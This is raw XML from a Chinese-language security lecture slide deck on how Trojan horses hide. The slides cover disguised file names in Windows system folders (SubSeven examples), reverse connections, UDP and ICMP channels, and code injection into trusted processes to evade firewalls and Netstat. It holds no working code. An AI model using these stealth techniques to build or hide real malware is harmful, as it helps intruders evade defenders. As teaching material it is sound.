            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>全网动态安全体系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>APPDRR</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3574814"/>
            <a:ext cx="4968552" cy="3283185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>位置：存放位置及文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通信：通信方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>活动：进程隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>特洛伊木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300"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0203B104-39C1-4ABC-AC18-FC21C71770DD}"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r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器（被控端）程序文件一般位置：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c:\windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c:\windows\system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一些系统文件在这两个位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件名尽量和系统文件接近，比如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SubSeven 1.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c:\windows\KERNEL16.DL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：木马服务器文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c:\windows\KERNEL32.DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：系统文件，删除系统瘫痪。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>SubSeven 1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器文件名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>c:\windows\window.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>， 少一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171010" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马存放位置及文件名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F867AAB7-D8EB-46C6-AD04-20ED6CE146A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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议，服务端侦听，客户端连接。最简单、最早、最广泛使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用工具很容易发现在某一端口上侦听的进程，以及进程对应的可执行文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端发起连接会被防火墙拦截。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>防火墙通常严进宽出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器通过代理上网电脑，没有独立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址(只有局域网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址)，客户端找不到服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马基本通信方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>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D215DC69-25F1-4F51-8E59-9FDDC12DC832}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"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内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196752"/>
            <a:ext cx="8229600" cy="2294236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在有固定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>或者域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第三方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（如公共邮箱，个人主页）发布自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>打开端口监听，等待服务端连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务端：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>定期获取客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，主动连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反向连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="灯片编号占位符 3"/>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695C2CCA-05F9-4444-AFFC-7AB97CC08DD8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="3340968"/>
            <a:ext cx="6591300" cy="1600200"/>
            <a:chOff x="1295400" y="1981200"/>
            <a:chExt cx="6591300" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 4" descr="0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0" y="2069232"/>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0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2057400"/>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5715000" y="1981200"/>
              <a:ext cx="228600" cy="1600200"/>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2" name="Line 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2514600" y="2514600"/>
              <a:ext cx="32004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8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4724400" y="2590800"/>
              <a:ext cx="914400" cy="5334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Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="20542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b="1"/>
                <a:t>连接请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1295400" y="5026297"/>
            <a:ext cx="6667500" cy="1643063"/>
            <a:chOff x="1295400" y="3962400"/>
            <a:chExt cx="6667500" cy="1643063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 10" descr="0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4200" y="40814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p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="4081463"/>
              <a:ext cx="228600" cy="1524000"/>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8" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2590800" y="4614863"/>
              <a:ext cx="4495800"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3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868144" y="415766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b="1"/>
                <a:t>连接请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 14" descr="0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41576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
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2422525" y="3962400"/>
              <a:ext cx="51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t>80</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461337" y="4509120"/>
            <a:ext cx="1038944" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="4481587"/>
            <a:ext cx="1263650" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>正向：服务端侦听，客户端连接；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>反向：客户端侦听，服务端连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>方法和安全性与使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议差不多。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不可靠：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>必须在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议基础上设计一个自己的可靠的报文传递协议。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54276" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>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B9C0212B-67E2-4132-B5CF-F87D57ED8E87}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无论正向、反向，服务端和客户端试图建立连接时都会引起防火墙得报警。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码注入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务端将自己注入可合法与外界网络通讯的进程（如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> ICQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等）地址空间，以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>新线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>形式运行，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>或者只是修改宿主进程，截获宿主进程的网络系统调用(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>WinSock)。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230402" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>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DC6C153F-235A-485D-B021-CC1919AB5CC9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议进行通讯：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由内核或进程直接处理而不需要通过端口。瞒过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和端口扫描软件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
